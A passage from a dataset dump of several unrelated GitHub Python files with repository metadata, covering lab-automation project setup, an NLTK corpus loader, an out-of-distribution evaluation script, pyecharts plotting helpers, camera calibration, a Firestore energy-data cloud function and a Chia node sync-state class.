UIs/\r\n\r\n │ ├ Actions/\r\n\r\n │ ├ Designs/\r\n\r\n │ └ Windows/\r\n\r\n └ Bots/\r\n\r\n └ Algorithms/\r\n\r\n\r\n :param parent_path: full path of the parent directory (typically Projects)\r\n :type parent_path: str\r\n\r\n :param project_name: Name of the project\r\n :type project_name: str\r\n\r\n :return: None\r\n \"\"\"\r\n\r\n try:\r\n project_dir = parent_path + '/' + project_name\r\n device_dir = project_dir + '/' + 'Devices'\r\n ui_dir = project_dir + '/' + 'UIs'\r\n bot_dir = project_dir + '/' + 'Bots'\r\n os.mkdir(project_dir)\r\n\r\n def add_directory(path, name):\r\n os.mkdir(path + '/' + name)\r\n\r\n add_directory(project_dir, 'Boot')\r\n add_directory(project_dir, 'Devices')\r\n add_directory(device_dir, 'Drivers')\r\n add_directory(device_dir, 'Protocols')\r\n add_directory(project_dir, 'Tasks')\r\n add_directory(project_dir, 'UIs')\r\n add_directory(ui_dir, 'Actions')\r\n add_directory(ui_dir, 'Designs')\r\n add_directory(bot_dir, 'Algorithms')\r\n\r\n except Exception as e:\r\n self.display('Error in Flab.create_project_directory')\r\n self.display(e)\r\n\r\n finally:\r\n pass\r\n\r\n def set_working_directory(self, project_path):\r\n \"\"\"\r\n\r\n Sets the current working directory to a given path\r\n\r\n :param project_path: the full path\r\n :type project_path: str\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n os.chdir(project_path)\r\n cwd = os.getcwd()\r\n par1 = os.path.abspath(os.path.join(cwd, '..'))\r\n par2 = os.path.abspath(os.path.join(par1, '..'))\r\n sys.path.append(par2)\r\n except Exception as e:\r\n self.display('Error in Flab.set_working_directory')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n def get_namespace(self):\r\n \"\"\"\r\n returns a representation of the Flab object's attributes and contained devices, tasks, etc.\r\n\r\n :return: FlabNamespace\r\n \"\"\"\r\n try:\r\n namespace = FlabNamespace()\r\n namespace.devices = self.devices.keys()\r\n namespace.tasks = self.tasks.keys()\r\n namespace.bots = self.bots.keys()\r\n namespace.vars = self.vars.copy()\r\n namespace.modules = self.modules.keys()\r\n namespace.uis = self.uis.keys()\r\n namespace.print_status = self.print_status\r\n namespace.is_running = self.is_running\r\n namespace.running_tasks = self.get_running_task_names()\r\n\r\n # getting task arguments and descriptions\r\n namespace.task_args = {}\r\n namespace.task_arg_descriptions = {}\r\n for task_name in namespace.tasks:\r\n namespace.task_args[task_name] = inspect.getfullargspec(self.tasks[task_name].run)\r\n full_args = namespace.task_args[task_name]\r\n if len(full_args) > 1:\r\n args_list = full_args.args[1:]\r\n arg_list = []\r\n opt_arg_list = []\r\n for a in args_list:\r\n if 'argument_descriptions' in dir(self.tasks[task_name]):\r\n namespace.task_arg_descriptions[task_name] = {}\r\n namespace.task_arg_descriptions[task_name] = self.tasks[task_name].argument_descriptions\r\n\r\n # getting device attributes, methods, arguments, descriptions\r\n namespace.device_attributes = {}\r\n namespace.device_methods = {}\r\n namespace.device_method_args = {}\r\n namespace.device_method_arg_descriptions = {}\r\n\r\n if len(namespace.devices) > 0:\r\n for i in namespace.devices:\r\n attribute_list = self.devices[i].list_attributes()\r\n method_list = self.devices[i].list_methods()\r\n namespace.device_attributes[i] = attribute_list\r\n namespace.device_methods[i] = method_list\r\n\r\n # getting the arguments and argument descriptions for each device method\r\n for device_name in namespace.devices:\r\n namespace.device_method_args[device_name] = {}\r\n namespace.device_method_arg_descriptions[device_name] = {}\r\n for method_name in namespace.device_methods[device_name]:\r\n full_args = self.devices[device_name].list_method_args(method_name)\r\n args_list = full_args.args[1:]\r\n namespace.device_method_args[device_name][method_name] = args_list\r\n namespace.device_method_arg_descriptions[device_name][method_name] = {}\r\n if 'argument_descriptions' in dir(self.devices[device_name]):\r\n for arg in args_list:\r\n namespace.device_method_arg_descriptions[device_name][method_name][arg] \\\r\n = self.devices[device_name].argument_descriptions[arg]\r\n else:\r\n for arg in args_list:\r\n namespace.device_method_arg_descriptions[device_name][method_name][arg] = str(arg)\r\n except Exception as e:\r\n if self.print_status:\r\n print('Error in Flab.get_namespace')\r\n print(e)\r\n namespace = None\r\n finally:\r\n return namespace\r\n\r\n\r\nclass FlabNamespace:\r\n \"\"\"\r\n A namespace for a Flab object which contains the information on the contained objects (e.g. Devices, Tasks,\r\n variables)\r\n \"\"\"\r\n\r\n def __init__(self) -> None:\r\n \"\"\"\r\n The constructor defines the namespace attributes with the following code:\r\n ::\r\n\r\n self.devices = []\r\n self.tasks = []\r\n self.bots = []\r\n self.vars = []\r\n self.modules = []\r\n self.uis = []\r\n self.print_status = []\r\n self.is_running = []\r\n self.running_tasks = []\r\n self.device_attributes = {}\r\n self.device_methods = {}\r\n self.device_method_args = {}\r\n self.device_method_arg_descriptions = {}\r\n\r\n \"\"\"\r\n\r\n self.devices = []\r\n self.tasks = []\r\n self.bots = []\r\n self.vars = []\r\n self.modules = []\r\n self.uis = []\r\n self.print_status = []\r\n self.is_running = []\r\n self.running_tasks = []\r\n self.device_attributes = {}\r\n self.device_methods = {}\r\n self.device_method_args = {}\r\n self.device_method_arg_descriptions = {}\r\n","repo_name":"njoseGIT/flab","sub_path":"flab/Flab.py","file_name":"Flab.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31236157238","text":"\"\"\" Access to categories and documents in NLTK corpora.\n See https://www.nltk.org/book/ch02.html for details.\n Add required classes using NLTK as template for other corpuses if needed.\n\"\"\"\n\nfrom nltk.corpus import reuters\nimport nltk\nimport logging\nfrom .doc_base import DocBase\n\n\nclass NLTK_Reuters_src(DocBase):\n def __init__(self, _):\n nltk.download('reuters')\n from nltk.corpus import reuters\n self._log = logging.getLogger(self.__class__.__name__)\n\n @property\n def categories(self):\n \"\"\" returns a tuple of categories names \"\"\"\n return reuters.categories()\n\n def doc_by_category(self, cat, stype='train'):\n super()._check_set_type(stype)\n doc_ids = reuters.fileids(cat)\n doc_ids_stype = [elem for elem in doc_ids if elem.startswith(stype)]\n doc_set = []\n for doc_id in doc_ids_stype:\n txt = reuters.raw(fileids=doc_id)\n doc_set.append(txt)\n self._log.debug('found %d documents in the category \"%s\", set type \"%s\"',\n len(doc_ids), cat, stype)\n return doc_set\n","repo_name":"rtaubes/news-time-series","sub_path":"modules/nltk_reuters_src.py","file_name":"nltk_reuters_src.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69841471788","text":"import numpy as np\nimport sys\nimport os\nimport pickle\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as trn\n\nfrom resnet import ResNet_Model\n\nparser = argparse.ArgumentParser(description='Evaluates a CIFAR OOD Detector',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n# Setup\nparser.add_argument('--test_bs', type=int, default=160)\nparser.add_argument('--num_to_avg', type=int, default=1, help='Average measures across num_to_avg runs.')\nparser.add_argument('--validate', '-v', action='store_true', help='Evaluate performance on validation distributions.')\nparser.add_argument('--use_xent', '-x', action='store_true', help='Use cross entropy scoring instead of the MSP.')\nparser.add_argument('--method_name', '-m', type=str, default='cifar10_allconv_baseline', help='Method name.')\n# Loading details\nparser.add_argument('--layers', default=40, type=int, help='total number of layers')\nparser.add_argument('--widen-factor', default=2, type=int, help='widen factor')\nparser.add_argument('--droprate', default=0.3, type=float, help='dropout probability')\nparser.add_argument('--load', '-l', type=str, default='./snapshots', help='Checkpoint path to resume / test.')\nparser.add_argument('--ngpu', type=int, default=1, help='0 = CPU.')\nparser.add_argument('--prefetch', type=int, default=2, help='Pre-fetching threads.')\n# EG and benchmark details\nparser.add_argument('--out_as_pos', action='store_true', help='OE define OOD data as positive.')\nparser.add_argument('--score', default='MSP', type=str, help='score options: MSP|energy')\nparser.add_argument('--T', default=1., type=float, help='temperature: energy|Odin')\nparser.add_argument('--noise', type=float, default=0, help='noise for Odin')\nparser.add_argument('--choice', type=str, default='vanilla')\nargs = parser.parse_args()\nprint(args)\n\n\n# mean and standard deviation of channels of CIFAR-10 images\nmean = [x / 255 for x in [125.3, 123.0, 113.9]]\nstd = [x / 255 for x in [63.0, 62.1, 66.7]]\n\ntest_transform = trn.Compose([trn.ToTensor(), trn.Normalize(mean, std)])\n\nnormalize = trn.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n\n\nnum_classes= 100\nnet = ResNet_Model(name='resnet34', num_classes=num_classes)\nstart_epoch = 0\n\nfrom collections import OrderedDict\ndef remove_data_parallel(old_state_dict):\n new_state_dict = OrderedDict()\n\n for k, v in old_state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n\n return new_state_dict\n\n# Restore model\nif args.load != '':\n for i in range(1000 - 1, -1, -1):\n subdir = 'energy_ft_sd'\n model_name = args.load\n\n if os.path.isfile(model_name):\n net.load_state_dict(remove_data_parallel(torch.load(model_name)))\n # net.load_state_dict(torch.load(model_name))\n print('Model restored! Epoch:', i)\n start_epoch = i + 1\n break\n if start_epoch == 0:\n assert False, \"could not resume \" + model_name\n\nnet.eval()\n\n\nif args.ngpu > 1:\n net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu)))\n\nif args.ngpu > 0:\n net.cuda()\n # torch.cuda.manual_seed(1)\n\ncudnn.benchmark = True # fire on all cylinders\n\n\n\ndef acc_print(test_loader):\n\n in_score, right_score, wrong_score = get_ood_scores(test_loader, in_dist=True)\n\n num_right = len(right_score)\n num_wrong = len(wrong_score)\n\n return 100 - 100 * num_wrong / (num_wrong + num_right)\n\n\n\n# #imagenet-v2\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imagenetv2/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n#imagenet-a\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imageneta/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\nid_mapping = test_data.class_to_idx\nnew_mapping = {}\nfor key in list(id_mapping.keys()):\n new_mapping[id_mapping[key]] = int(key)\n# breakpoint()\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imageneta/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]), target_transform=lambda id: new_mapping[id])\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n\n\ntest_data = \\\n torchvision.datasets.ImageFolder(\n os.path.join('/nobackup/dataset/my_xfdu/IN100_new/', 'val'),\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n\n\n\n","repo_name":"deeplearning-wisc/dream-ood","sub_path":"scripts/test_ood_in100_robustness.py","file_name":"test_ood_in100_robustness.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"34249718511","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Bar, Grid, Line, Liquid, Page, Pie,Tab\nfrom pyecharts.commons.utils import JsCode\nfrom pyecharts.components import Table\nfrom pyecharts.faker import Faker\nfrom pyecharts.components import Image\nfrom pyecharts.options import ComponentTitleOpts\nimport random\n# 柱状图\ndef draw_bar_plays(data,user_id,title=\"听歌方式\"):\n \"\"\"\n 两种听歌方式\n :param plays:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_plays.html\"\n x = [\"片段播放\", \"完整播放\"]\n color = [\"#749f83\", \"#d48265\"]\n\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"用户:\"+str(user_id), y,color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),toolbox_opts=opts.ToolboxOpts())\n #.render(file_name)\n )\n return c\n\ndef draw_pie_recoder(data,user_id,title=\"用户行为占比\"):\n \"\"\"\n 用户行为占比\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_pie_recoder.html\"\n\n c = (\n Pie(init_opts=opts.InitOpts(width=\"500px\",height=\"300px\"))\n .add(\n \"\",\n data,\n center=[\"25%\", \"50%\"],\n )\n\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {d}% \"))\n .set_global_opts(legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"45%\", orient=\"vertical\"))\n\n )\n return c\n\ndef draw_bar_recoder(data,user_id,title = \"用户行为统计\"):\n \"\"\"\n 用户行为统计\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_recoder.html\"\n x = [\"循环播放\",\"片段播放\",\"查看评论\",\"点赞评论\",\"收藏歌曲\"]\n color = [\"#F79709\",\"#749f83\", \"#d48265\",\"#33CCCC\",\"#82C182\"]\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx][1],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"\" , y, color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),\n toolbox_opts=opts.ToolboxOpts()\n )\n # .render(file_name)\n )\n return c\n\ndef draw_line_clip(data,user_id,title = \"片段播放习惯\"):\n \"\"\"\n 片段播放习惯\n :param playhobbys:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_line_clip.html\"\n x_data = []\n for i in range(300):\n x_data.append(i)\n\n c = (\n Line()\n .add_xaxis(\n xaxis_data=x_data\n )\n .add_yaxis(\n \"palycounts\",\n data,\n symbol_size=0,\n label_opts=opts.LabelOpts(is_show=False),\n is_smooth=True\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(\n title=title, pos_left=\"center\"\n ),\n\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\"),\n datazoom_opts=[\n opts.DataZoomOpts(\n is_show=True,\n )\n ],\n xaxis_opts=opts.AxisOpts(\n type_ = \"category\",\n boundary_gap=False,\n axisline_opts=opts.AxisLineOpts(is_on_zero=True)\n ),\n yaxis_opts=opts.AxisOpts(name=\"playcounts\"),\n legend_opts=opts.LegendOpts(pos_left=\"left\"),\n toolbox_opts=opts.ToolboxOpts(\n is_show=True,\n feature={\n \"dataZoom\": {\"yAxisIndex\": \"none\"},\n \"restore\": {},\n \"saveAsImage\": {},\n },\n ),\n )\n #.render(file_name)\n )\n return c\n\ndef draw_pie_like(data,user_id,title=\"偏爱曲风比重\"):\n \"\"\"\n 圆饼图 偏爱歌曲比重\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_pie_like.html\"\n c = (\n Pie()\n .add(\n \"\",\n data,\n radius=[\"30%\", \"55%\"],\n label_opts=opts.LabelOpts(\n position=\"outside\",\n formatter=\"{b}: {d}% \",\n ),\n center=[\"25%\", \"50%\"],\n )\n .set_global_opts(\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"45%\", orient=\"vertical\")\n )\n #.render(file_name)\n )\n return c\n\ndef draw_bar_like(data,user_id,title=\"偏爱曲风统计\"):\n \"\"\"\n 柱状图 偏爱统计\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_like.html\"\n x = [\"古风\", \"古典\", \"电子\", \"民谣\", \"流行\", \"说唱\", \"摇滚\"]\n color = [\"#C43C3C\", \"#7D573E\", \"#E6E65D\", \"#69DA69\", \"#70D4D4\", \"#9B7CC7\", \"#A2A2A2\"]\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx][1],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"\", y, color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),\n toolbox_opts=opts.ToolboxOpts()\n )\n #.render(file_name)\n )\n return c\n\ndef draw_cloud(url,user_id,title = \"用户词云\"):\n image = Image()\n\n image.add(\n src=url,\n style_opts={\"width\": \"800px\", \"height\": \"500px\", \"style\": \"margin-left: 200px\"},\n )\n image.set_global_opts(\n title_opts=ComponentTitleOpts(title=title, subtitle=\"用户:\"+str(user_id))\n )\n\n return image\n\n\ndef grid_recoder(data,user_id):\n bar = draw_bar_recoder(data, user_id)\n pie = draw_pie_recoder(data, user_id)\n grid = (\n Grid(init_opts=opts.InitOpts(width=\"1400px\",height=\"500px\"))\n .add(bar, grid_opts=opts.GridOpts(pos_left=\"55%\"))\n .add(pie, grid_opts=opts.GridOpts(pos_right=\"55%\"))\n\n )\n return grid\n\ndef grid_like(data,user_id):\n bar = draw_bar_like(data, user_id)\n pie = draw_pie_like(data, user_id)\n grid = (\n Grid(init_opts=opts.InitOpts(width=\"1400px\",height=\"500px\"))\n .add(bar, grid_opts=opts.GridOpts(pos_left=\"55%\"))\n .add(pie, grid_opts=opts.GridOpts(pos_right=\"55%\"))\n\n )\n return grid\n\ndef page_plays(data1,data2,user_id):\n bar = draw_bar_plays(data1, user_id)\n line = draw_line_clip(data2, user_id)\n page = Page(layout=Page.SimplePageLayout)\n page.add(\n bar,\n line,\n )\n #page.render(\"page_simple_layout.html\")\n return page\n\ndef user_tab(data_set,user_id,title=\"用户数据分析\"):\n \"\"\"\n\n :param data_set:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_data.html\"\n url = \"cloud_\" + str(user_id) + \".jpg\"\n tab = Tab()\n tab.add(grid_recoder(data_set[0],user_id), \"用户行为统计\")\n tab.add(grid_like(data_set[1],user_id), \"用户偏爱分析\")\n # tab.add(page_plays(data_set[2],data_set[3],user_id), \"用户习惯\")\n tab.add(draw_bar_plays(data_set[2], user_id), \"用户播放方式\")\n tab.add(draw_line_clip(data_set[3], user_id), \"片段播放频率统计\")\n tab.add(draw_cloud(url, user_id), \"歌词词云\")\n tab.render(file_name)\n\n\n\nif __name__ == '__main__':\n print(\"-----\")\n # bar_color_demo()\n # draw_bar_plays([10,130],111)\n #\n # grid_demo()\n data_set=[]\n data = [(\"循环播放\", 3), (\"片段播放\", 2), (\"查看评论\", 1), (\"点赞评论\", 5), (\"收藏歌曲\", 3)]\n # page_recoder(data,222)\n data_set.append(data)\n data = [(\"古风\", 3), (\"古典\", 2), (\"电子\", 1), (\"民谣\", 5), (\"流行\", 3), (\"说唱\", 1), (\"摇滚\", 1)]\n data_set.append(data)\n data_set.append([110,50])\n data1 = []\n for i in range(300):\n data1.append(i)\n data_set.append(data1)\n # page_plays([110,20],data1,33)\n url = \"user_data/cloud_393361316.jpg\"\n data_set.append(url)\n user_tab(data_set,393361316)\n\n # draw_cloud(url,333)\n # data1 = []\n # for i in range(300):\n # data1.append(random.randint(0, 5))\n # draw_line_clip(data1,22222)\n # grid_demo()\n # draw_bar_plays([110,20],123)\n # draw_line_playhobby()\n # print(pyecharts.__version__)\n # draw_pie_hobby()\n # data = [(\"古风\",3),(\"古典\",2),(\"电子\",1),(\"民谣\",5),(\"流行\",3),(\"说唱\",1),(\"摇滚\",1)]\n # # draw_pie_plays([110,20],123)\n # draw_bar_like(data,123)","repo_name":"LineseWorld/Music-Classification","sub_path":"charts_tool.py","file_name":"charts_tool.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"39148802996","text":"'''\nCreated on Jan 19, 2019\n\n@author: SG0301464\n'''\n\nimport cv2\nimport numpy as np\nimport glob\nimport matplotlib.pyplot as plt\nimport os.path as path\nimport pickle\n\n\ndef distortionCorrection(calib_images_dir):\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = np.zeros((6 * 9, 3), np.float32)\n objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob(path.join(calib_images_dir, 'calibration*.jpg'))\n\n # Step through the list and search for chessboard corners\n for filename in images:\n\n img = cv2.imread(filename)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)\n\n if pattern_found is True:\n objpoints.append(objp)\n imgpoints.append(corners)\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n return ret, mtx, dist, rvecs, tvecs\n\n\ndef undistort(frame, mtx, dist):\n\n frame_undistorted = cv2.undistort(frame, mtx, dist, newCameraMatrix=mtx)\n return frame_undistorted\n\n\ndef showDisortImageToCorrectImage():\n ret, mtx, dist, rvecs, tvecs = distortionCorrection(calib_images_dir='camera_cal')\n img = cv2.imread('camera_cal/calibration1.jpg')\n img_undistorted = undistort(img, mtx, dist)\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 4))\n f.tight_layout()\n ax1.imshow(img)\n ax1.plot(580 , 173, '.')\n ax1.plot(577 , 274 , '.')\n ax1.plot(457, 269, '.')\n ax1.plot(463, 160, '.')\n ax1.set_title('Original Image', fontsize=10)\n ax2.imshow(img_undistorted)\n ax2.set_title('Undistorted and Warped Image', fontsize=10)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n\nif __name__ == '__main__':\n showDisortImageToCorrectImage()\n\n# cv2.imwrite('img/test_calibration_before.jpg', img)\n# cv2.imwrite('img/test_calibration_after1.jpg', img_undistorted)\n","repo_name":"mukeshk05/Advanced-Lane-Finding","sub_path":"Project2_1.py","file_name":"Project2_1.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22109977162","text":"\"\"\"\n CLOSEST K POINTS TO ORIGIN\n\n Given a list of points in the form [(X1, Y1), X2, Y2), ... , (XN-1, YN-1), (XN, YN)], and an integer k, write a\n function that returns the k nearest points to the origin (0, 0).\n\n Example:\n Input = [(-2, 4), (0, -2), (-1, 0), (3, 5), (-2, -3), (3, 2)], 3\n Output = [(-2, 4), (0, -2), (-1, 0)]\n\n NOTE: Variations on this program could include:\n - K nearest points to a specified (non-origin) point.\n\"\"\"\nimport heapq\nimport math\n\n\n# Iterative Approach using a Max Heap (of size k): The runtime is O(n + (n - k)log(k)), and space is O(k).\ndef closest_k_points_to_origin(l, k):\n if k == len(l):\n return l\n elif k < len(l):\n max_heap = []\n for (x, y) in l[0:k]:\n max_heap.append((-dist_between_two_points(x, y, 0, 0), (x, y)))\n heapq.heapify(max_heap)\n for (x, y) in l[k:]:\n dist = -dist_between_two_points(x, y, 0, 0)\n if dist < max_heap[0][0]:\n heapq.heappushpop(max_heap, (dist, (x, y)))\n return [p for _, p in heapq.nsmallest(k, max_heap)]\n\n\ndef dist_between_two_points(x1, y1, x2, y2):\n return math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n\nprint(closest_k_points_to_origin([(-2, 4), (0, -2), (-1, 0), (3, 5), (-2, -3), (3, 2)], 3))\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/math/closest_k_points_to_origin.py","file_name":"closest_k_points_to_origin.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32063929261","text":"import datetime\nimport time\nfrom firebase_admin import firestore, initialize_app\n\ntimes = {}\n\nstart = time.time()\n\n# Initialize Firestore DB\ninitialize_app()\ndb = firestore.client()\n\nend = time.time()\ntimes['db'] = end - start\n\ndef measure_time(func):\n def wrap(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n\n times[func.__name__] = end - start\n # print(func.__name__, end - start)\n return result\n\n return wrap\n\n@measure_time\ndef query_energy_data(zone_code: [int], date_from: str, duration: int, join: bool, light: bool) -> [dict]:\n\n # Initialize dicts which will be used for join\n reference_zones = {}\n resolution_codes = {}\n\n # Refactor DateTimes from string to date object and calculate the \"date_to\"\n date_from = datetime.datetime.strptime(date_from, '%d-%m-%Y')\n date_to = date_from + datetime.timedelta(days=duration)\n\n # Query Data from Firestore\n data_ref = db.collection(u'total_load_data')\n query = data_ref \\\n .where(u'entsoeAreaReference_FK', u'in', zone_code) \\\n .where(u'DateTime', u'>=', date_from) \\\n .where(u'DateTime', u'<=', date_to)\n # .order_by(u'time')\n results = query.stream()\n\n # Join energy data with information about resolution codes and reference zones\n final = []\n for result in results:\n doc = result.to_dict()\n\n if join:\n # Join Reference Zone (caching technique)\n zone_code = doc['entsoeAreaReference_FK']\n if zone_code not in reference_zones.keys():\n ref_zone_doc = db.collection('reference-zones').document(str(zone_code)).get().to_dict()\n reference_zones[zone_code] = ref_zone_doc\n doc['ReferenceZoneInfo'] = reference_zones[zone_code]\n\n # Join Resolution Codes (caching technique)\n resolution_code = doc['ResolutionCode_FK']\n if resolution_code not in resolution_codes.keys():\n res_code_doc = db.collection('resolution_codes').document(\n str(resolution_code)).get().to_dict()\n resolution_codes[resolution_code] = res_code_doc\n doc['ResolutionCodeInfo'] = resolution_codes[resolution_code]\n\n if light:\n keys = ['TotalLoadValue',\n 'DateTime',\n 'ResolutionCode_FK',\n 'ResolutionCodeInfo',\n 'entsoeAreaReference_FK',\n 'ReferenceZoneInfo']\n doc = {k: v for k, v in doc.items() if k in keys}\n\n final.append(doc)\n\n return final\n\n@measure_time\ndef energy_data(request):\n\n if request.method == 'POST':\n\n # Get parameters\n payload = request.get_json()\n zone_codes = payload['zone_codes']\n date_from = payload['date_from']\n duration = payload['duration']\n join = payload['join']\n light = payload['light']\n\n # Get data\n data = query_energy_data(zone_codes, date_from, duration, join, light)\n\n # Make them JSON serializable\n for i in range(len(data)):\n doc = data[i]\n\n # Refactor datetime from str to date-objects\n datetime_keys = ['EntityCreatedAt', 'EntityModifiedAt', 'DateTime', 'UpdateTime']\n for key in datetime_keys:\n if key in doc.keys():\n data[i][key] = str(doc[key])\n\n if payload['join']:\n data[i]['ReferenceZoneInfo']['AreaRefAddedOn'] = str(doc['ReferenceZoneInfo']['AreaRefAddedOn'])\n data[i]['ResolutionCodeInfo']['EntityCreatedAt'] = str(doc['ResolutionCodeInfo']['EntityCreatedAt'])\n data[i]['ResolutionCodeInfo']['EntityModifiedAt'] = str(doc['ResolutionCodeInfo']['EntityModifiedAt'])\n\n return {\n 'times': times,\n 'parameters': payload,\n 'len_of_data': len(data),\n 'data': data\n }\n\n if request.method == 'GET':\n\n # Get query parameters\n zone_code = request.args.get('zone_code', default=None, type=str)\n date_from = request.args.get('date_from', default='01-10-2020', type=str)\n duration = request.args.get('duration', default='10', type=str)\n\n if zone_code is None:\n return \"Zone Code needed.\", 400\n\n # Get data\n data = query_energy_data([int(zone_code)], date_from, int(duration), False, True)\n\n # Make them JSON serializable\n for i in range(len(data)):\n doc = data[i]\n\n # Refactor datetime from str to date-objects\n datetime_keys = ['EntityCreatedAt', 'EntityModifiedAt', 'DateTime', 'UpdateTime']\n for key in datetime_keys:\n if key in doc.keys():\n data[i][key] = str(doc[key])\n\n return {\n 'times': times,\n 'parameters': {\n 'zone_code': zone_code,\n 'date_from': date_from,\n 'duration': duration\n },\n 'len_of_data': len(data),\n 'data': data\n }\n","repo_name":"Cloud-Engineering-Softlab-Project/Firebase-CloudFunctions-poly","sub_path":"energy-data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18259024270","text":"from ...core import ApiRequestFailedException\n\nclass NodeSyncState:\n @classmethod\n async def create(cls, rpc, session):\n result = NodeSyncState()\n try:\n json = await rpc.post(session, 'get_blockchain_state')\n except ApiRequestFailedException:\n return result\n result.available = True\n json = json['blockchain_state']\n synced = json['sync']['synced']\n height = None\n peak = 0\n if not synced:\n peak = json['sync']['sync_tip_height']\n if json['sync']['sync_mode']:\n height = json['sync']['sync_progress_height']\n else:\n peak = json['peak']['height']\n height = peak\n\n result.synced = synced\n result.height = height\n result.peak = peak\n\n return result\n\n def __init__(self):\n self.available = False\n self.synced = False\n self.height = None\n self.peak = 0\n","repo_name":"danielringch/xiamon","sub_path":"xiamon/src/plugins/chianode/nodesyncstate.py","file_name":"nodesyncstate.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} 